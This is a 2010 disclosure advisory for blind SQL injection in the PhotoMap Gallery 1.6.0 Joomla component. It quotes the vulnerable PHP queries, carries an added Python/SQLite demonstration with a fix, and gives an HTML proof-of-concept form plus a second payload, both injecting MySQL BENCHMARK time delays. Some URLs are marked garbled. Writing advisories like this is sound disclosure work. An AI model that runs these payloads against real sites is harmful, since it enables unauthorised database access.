[Recommended] PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
Posted: 2010-7-28 23:50
Name              PhotoMap Gallery  

Vendor            [vendor URL garbled in this copy of the advisory]

Versions Affected 1.6.0  

   

Author            Salvatore Fresta aka Drosophila  

Website           [author URL garbled in this copy of the advisory]

Contact           salvatorefresta [at] gmail [dot] com  

Date              2010-07-28  

   

X. INDEX  

   

I.    ABOUT THE APPLICATION  

II.   DESCRIPTION  

III.  ANALYSIS  

IV.   SAMPLE CODE  

V.    FIX  

   

   

I. ABOUT THE APPLICATION  

________________________  

   

PhotoMap Gallery is a gallery component completely integrated into
Joomla 1.5.x. Like 'Picasa', 'Flickr', or 'Panoramio', you can easily
add geo-tags to your photos so that you can remember exactly where
they're from using Google Maps.

   

   

II. DESCRIPTION  

_______________  

   

Some parameters are not properly sanitised before being used in SQL
queries.

   

   

III. ANALYSIS  

_____________  

   

Summary:   

   

A) Multiple Blind SQL Injection  

_______________________________  

   

The parameter id passed to controller.php via POST when view is set
to user and task is set to save_usercategory is not properly
sanitised before being used in a SQL query. The value is concatenated
into the WHERE clause as a bare number, with no quoting and no cast,
so everything after the numeric prefix becomes part of the query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code. Note that save_usercategory first calls
JRequest::checkToken(), so the request must carry the Joomla form
token of the attacker's own session (the hidden field in the PoC
below); that check is a CSRF defence, not input validation, and does
not stop an attacker who submits the payload from their own session.

The parameter folder passed to imagehandler.php is not properly
sanitised before being used in a SQL query. getList() builds its
query with the same unquoted concatenation, so this can likewise be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

Neither query echoes its result to the attacker, which is why the
injection is blind: the PoC uses MySQL's BENCHMARK() to turn a true
condition into a measurable delay.

   

The following is the affected code.  

   

controller.php (line 1135):

function save_usercategory() {

    // Check for request forgeries
    JRequest::checkToken() or jexit( 'Invalid Token' );

    $user           = & JFactory::getUser();
    $task           = JRequest::getVar('task');
    $post           = JRequest::get('post');

    //perform access checks
    $isNew = ($post['id']) ? false : true;

//  $catid = (int) JRequest::getVar('catid', 0);

    $db     =& JFactory::getDBO();
    $query = 'SELECT c.id, c.directory'
                . ' FROM #__g_categories AS c'
                . ' WHERE c.id = '.$post['id'];

   

   

imagehandler.php (line 109):

function getList() {

    static $list;

    // Only process the list once per request
    if (is_array($list)) {
        return $list;
    }

    // Get folder from request
    $folder = $this->getState('folder');
    $search = $this->getState('search');

    $query = 'SELECT *'
            . ' FROM #__g_categories'
            . ' WHERE id = '.$folder;
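To make the two affected queries concrete, the following added example (not code from the advisory or from the PhotoMap Gallery project) rebuilds the pattern in Python over an in-memory SQLite table standing in for #__g_categories. The table name jos_g_categories, its rows and the helper names are assumptions made for the example. It shows the bare concatenation used by both controller.php and imagehandler.php letting an attacker-supplied condition decide whether rows come back, which is what makes the bug blind-exploitable, and beside it the (int) cast and bound parameter that the commented-out $catid line in controller.php hints at. SQLite has no BENCHMARK(), so the oracle here is boolean rather than time-based as in the PoC.

```python
import re
import sqlite3
from typing import List, Tuple

# Stand-in for Joomla's #__g_categories with the "jos_" table prefix; the rows
# are constructed for this example (assumption: only id and directory matter).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE jos_g_categories (id INTEGER PRIMARY KEY, directory TEXT)"
    )
    conn.executemany(
        "INSERT INTO jos_g_categories (id, directory) VALUES (?, ?)",
        [(1, "holidays"), (2, "family"), (3, "private")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, request_id: str) -> List[Tuple[int, str]]:
    # Same construction as controller.php / imagehandler.php: the request value
    # is glued onto the WHERE clause as a bare, unquoted number.
    query = (
        "SELECT c.id, c.directory FROM jos_g_categories AS c WHERE c.id = "
        + request_id
    )
    return conn.execute(query).fetchall()


def php_int_cast(value: str) -> int:
    # Mimics PHP's (int) cast on a string: leading whitespace, an optional sign
    # and the leading digits are kept, the rest is dropped; no digits gives 0.
    m = re.match(r"\s*([-+]?\d+)", value)
    return int(m.group(1)) if m else 0


def lookup_fixed(conn: sqlite3.Connection, request_id: str) -> List[Tuple[int, str]]:
    # The fix the commented-out $catid line points at: cast to int so only a
    # number can reach the query, then bind it instead of concatenating.
    cid = php_int_cast(request_id)
    query = "SELECT c.id, c.directory FROM jos_g_categories AS c WHERE c.id = ?"
    return conn.execute(query, (cid,)).fetchall()


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    # Boolean-based blind inference: id=-1 matches nothing, so rows come back
    # only when the attacker-chosen condition is true. The advisory's PoC does
    # the same through a timing side channel (MySQL BENCHMARK).
    return len(lookup_vulnerable(conn, "-1 OR (" + condition + ")")) > 0


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "2"))          # [(2, 'family')]
    print(lookup_vulnerable(db, "-1 OR 1=1"))  # all three rows
    print(blind_oracle(db, "(SELECT COUNT(*) FROM jos_g_categories) = 3"))  # True
    print(lookup_fixed(db, "-1 OR 1=1"))       # [] , payload truncated to -1
```

The cast alone is enough for a numeric id, but binding the value as well keeps the query safe if the column type is ever changed to a string.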

   

   

   

IV. SAMPLE CODE  

_______________  

   

A) Multiple Blind SQL Injection  

   

Replace 89eb36eca1919aff534b13b54796c9a4 with your own Joomla form token
(the per-session token checked by JRequest::checkToken(); it is the
name of the hidden field below). The payload uses an always-true
condition (0x41=0x41), so a long response time confirms the injection.

   

<html>
    <head>
        <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
    </head>
    <body>
        <form method="POST" action="http://127.0.0.1/joomla/index.php">
            <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
            <input type="hidden" name="option" value="com_photomapgallery">
            <input type="hidden" name="controller" value="">
            <input type="hidden" name="view" value="user">
            <input type="hidden" name="task" value="save_usercategory">
            <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
            <input type="submit">
        </form>
    </body>
</html>

   

   

The second vector, the folder parameter read by imagehandler.php, was
given as a URL. That URL is garbled in this copy of the advisory; only
the injected value, using the same always-true BENCHMARK delay,
survives:

[garbled URL] OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

   

   

V. FIX  

______  

   

No fix.
